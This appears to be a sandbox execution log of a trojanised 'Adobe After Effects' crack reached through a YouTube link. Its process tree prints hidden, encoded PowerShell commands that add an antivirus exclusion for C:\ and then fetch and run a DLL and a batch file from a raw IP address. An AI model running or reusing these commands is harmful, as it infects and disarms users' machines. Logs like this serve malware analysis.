PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbjdjY2x2QnBESHVCTGpBQ3VoODBOOUd5X3NGZ3xBQ3Jtc0ttc19uRDVKZ1NiM0hlWlJBSWRqS0hjaVhIaGVkWmp5dF8zTC13WDl5R0tqcWlFQy1pcWxEbWZ6TTJJSXFtY0V6MDlPdExIcUs4RzJmLU1qSV9hTHM3U2dRNlFQUkctYnhXbEJfTV9nUWdZdjkyWkJqUQ&q=https%3A%2F%2Fone-clickr.cc%2Fadobeaftereffects&v=JJZwHzx1Xlk
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa50e64f50,0x7ffa50e64f60,0x7ffa50e64f70
  2⤵
  PID:3480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1688 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1640 /prefetch:2
  2⤵
  PID:3452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2368 /prefetch:8
  2⤵
  PID:2372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:1
  2⤵
  PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1
  2⤵
  PID:4948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4144 /prefetch:8
  2⤵
  PID:832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
  2⤵
  PID:4884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4944 /prefetch:8
  2⤵
  PID:1016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4192 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4356 /prefetch:8
  2⤵
  PID:3868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4368 /prefetch:8
  2⤵
  PID:4664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  PID:3684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4316 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4236 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4312 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2932 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=780 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5220 /prefetch:8
  2⤵
  PID:3968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4688 /prefetch:8
  2⤵
  PID:824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4400 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5464 /prefetch:8
  2⤵
  PID:1888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4356 /prefetch:8
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5640 /prefetch:8
  2⤵
  PID:2176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 /prefetch:8
  2⤵
  PID:2712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4504 /prefetch:8
  2⤵
  PID:1408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,7261226559701659472,4523805477101386621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5668 /prefetch:8
  2⤵
  PID:1956

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2656

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\" -spe -an -ai#7zMap19890:118:7zEvent26600
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\winrar611\" -spe -an -ai#7zMap31440:138:7zEvent8111
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4912

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\" -spe -an -ai#7zMap23317:156:7zEvent25534
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4864

C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe
"C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe"
1⤵
- Executes dropped EXE
PID:3684
- C:\Users\Admin\AppData\Local\Temp\is-V0GV3.tmp\Adobe.After.Effects.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-V0GV3.tmp\Adobe.After.Effects.tmp" /SL5="$50260,1644573423,912384,C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:1732
- - C:\Users\Admin\AppData\Local\Temp\is-MRBS3.tmp\Adobe.After.Effects.2023.v23.0.0.59.exe
    "C:\Users\Admin\AppData\Local\Temp\is-MRBS3.tmp\Adobe.After.Effects.2023.v23.0.0.59.exe"
    3⤵
    - Executes dropped EXE
    - Drops autorun.inf file
    PID:1212
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\install\helper.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\install\helper.exe" /XSTART
      4⤵
      PID:4252
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /flushdns
        5⤵
        Gathers network information
        
        PID:1384
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /flushdns
        5⤵
        Gathers network information
        
        PID:1436
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /flushdns
        5⤵
        Gathers network information
        
        PID:1312
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /flushdns
        5⤵
        Gathers network information
        
        PID:1532
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\Autorun.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\Autorun.exe
        5⤵
        
        PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LauncherWC\main.bat" "
    3⤵
    PID:1012
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex alLSigNeD -NOl -w hIdDEn -EC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXAAnACkA
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3704
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex ALlsIgned -nOnI -W HIdDEN -eC IAAJACgAIAAuACgAJwBOAGUAdwAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJwAtAE8AQgBKAGUAYwBUACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkAIAAoACAAWwBDAGgAQQByAF0AIAAJADEAMQAwACAACQAgAAkAKwAgAAkAWwBjAGgAYQBSAF0AIAAJADYAOQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQA4ADQAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBDAGgAYQByAF0AIAAJADgANwAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQAxADAAMQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA2ADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANgA3ACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADEAMAA4ACAACQAgAAkAKwAgAAkAWwBjAEgAYQByAF0AIAAJADEAMAA1ACAACQAgAAkAKwAgAAkAWwBjAEgAQQByAF0AIAAJADEAMAAxACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADcAOAAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANgAgAAkAIAApACAACQApAC4AKAAgAAkAWwBDAEgAQQBSAF0AIAAJADYAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQAxADEAMQAgAAkAIAAJACsAIAAJAFsAYwBIAEEAUgBdACAACQA4ADcAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAxADAAIAAJACAACQArACAACQBbAEMASABBAFIAXQAgAAkAMQAwADgAIAAJACAACQArACAACQBbAEMASABBAFIAXQAgAAkANwA5ACAACQAgAAkAKwAgAAkAWwBjAEgAYQByAF0AIAAJADkANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA2ADgAIAAJACAACQArACAACQBbAEMASABBAFIAXQAgAAkAMQAwADIAIAAJACAACQArACAACQBbAEMAaABBAHIAXQAgAAkAMQAwADUAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkANwA2ACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADEAMAAxACAACQAgACkALgBJAG4AdgBvAGsAZQAoACAAHSBoAHQAdABwADoALwAvADEAMwA1AC4AMQA4ADEALgAxADIAMwAuADIANgAvAHMAYwBjAHAAMwAyAC4AZABsAGwAHSAgACwAIAAJAB0gJABlAE4AdgA6AGEAbABMAHUAUwBFAHIAUwBwAFIATwBGAGkAbABlAFwAcwBjAGMAcAAzADIALgBkAGwAbAAdICAAIAApACAAIAA7ACAAJgAgACAAHSAkAGUATgB2ADoAYQBsAGwAVQBzAGUAcgBTAFAAcgBvAEYASQBMAEUAXABzAGMAYwBwADMAMgAuAGQAbABsAB0g
      4⤵
      PID:312
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex ALLSIGned -NoNI -w hIdden -eC IAAJACgAIAAuACgAJwBOAGUAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACcAdwAtAE8AQgBKACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAEUAQwAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJwBUACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkAIAAJACgAIABbAEMAaABBAHIAXQAgADcAOAAgACAAKwAgAFsAYwBIAGEAcgBdACAANgA5ACAAIAArACAAWwBjAGgAQQByAF0AIAAxADEANgAgACAAKwAgAFsAQwBIAGEAcgBdACAANAA2ACAAIAArACAAWwBDAEgAYQByAF0AIAAxADEAOQAgACAAKwAgAFsAYwBIAGEAUgBdACAAMQAwADEAIAAgACsAIABbAGMAaABhAHIAXQAgADkAOAAgACAAKwAgAFsAYwBoAEEAcgBdACAAOQA5ACAAIAArACAAWwBDAEgAYQBSAF0AIAAxADAAOAAgACAAKwAgAFsAYwBIAEEAcgBdACAANwAzACAAIAArACAAWwBjAEgAQQBSAF0AIAAxADAAMQAgACAAKwAgAFsAQwBoAEEAcgBdACAAMQAxADAAIAAgACsAIABbAEMAaABBAHIAXQAgADEAMQA2ACAAIAAgACkAIAAgACkALgAoACAACQBbAGMAaABhAFIAXQAgAAkANgA4ACAACQAgAAkAKwAgAAkAWwBDAGgAQQBSAF0AIAAJADEAMQAxACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADgANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA3ADgAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkANwA2ACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADEAMQAxACAACQAgAAkAKwAgAAkAWwBjAGgAYQBSAF0AIAAJADYANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAUgBdACAACQA2ADgAIAAJACAACQArACAACQBbAEMAaABhAFIAXQAgAAkAMQAwADIAIAAJACAACQArACAACQBbAEMAaABhAFIAXQAgAAkAMQAwADUAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAwADgAIAAJACAACQArACAACQBbAGMASABBAHIAXQAgAAkAMQAwADEAIAAJACAAKQAuAGkATgBWAG8AawBFACgAIAAJAB0gaAB0AHQAcAA6AC8ALwAxADMANQAuADEAOAAxAC4AMQAyADMALgAyADYALwByAHUAbgBkAGwAbAAzADIALgBiAGEAdAAdICAALAAgAB0gJABFAG4AVgA6AEEAbABsAHUAUwBlAHIAUwBQAFIAbwBGAGkAbABlAFwAcgB1AG4AZABsAGwAMwAyAC4AYgBhAHQAHSAgAAkAKQAgACAAOwAgAAkAJgAgACAAHSAkAEUATgBWADoAQQBsAGwAVQBzAGUAcgBTAHAAcgBvAEYAaQBsAGUAXAByAHUAbgBkAGwAbAAzADIALgBiAGEAdAAdIA==
      4⤵
      PID:1580
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\PROGRA~3\rundll32.bat" "C:\ProgramData\rundll32.bat" "
        5⤵
        
        PID:3060
      - C:\Windows\SysWOW64\rundll32.exe
        
        rundll32.exe sccp32.dll, _Start@16
        6⤵
        
        PID:3328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 600
        7⤵
        Program crash
        
        PID:3912

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\winrar611"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:528

C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\winrar611.exe
"C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\winrar611.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2132

C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe
"C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe"
1⤵
- Executes dropped EXE
PID:1772
- C:\Users\Admin\AppData\Local\Temp\is-VM6M5.tmp\Adobe.After.Effects.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-VM6M5.tmp\Adobe.After.Effects.tmp" /SL5="$10358,1644573423,912384,C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:1016
- - C:\Users\Admin\AppData\Local\Temp\is-611CF.tmp\Adobe.After.Effects.2023.v23.0.0.59.exe
    "C:\Users\Admin\AppData\Local\Temp\is-611CF.tmp\Adobe.After.Effects.2023.v23.0.0.59.exe"
    3⤵
    - Executes dropped EXE
    - Drops autorun.inf file
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\AfterEffects2023\install\helper.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\AfterEffects2023\install\helper.exe" /XSTART
      4⤵
      PID:832
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /flushdns
        5⤵
        Gathers network information
        
        PID:4040
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /flushdns
        5⤵
        Gathers network information
        
        PID:2728
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /flushdns
        5⤵
        Gathers network information
        
        PID:2384
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /flushdns
        5⤵
        Gathers network information
        
        PID:3068
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\AfterEffects2023\Autorun.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\AfterEffects2023\Autorun.exe
        5⤵
        
        PID:3544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LauncherWC\main.bat" "
    3⤵
    PID:4680
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex alLSigNeD -NOl -w hIdDEn -EC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXAAnACkA
      4⤵
      Suspicious behavior: EnumeratesProcesses
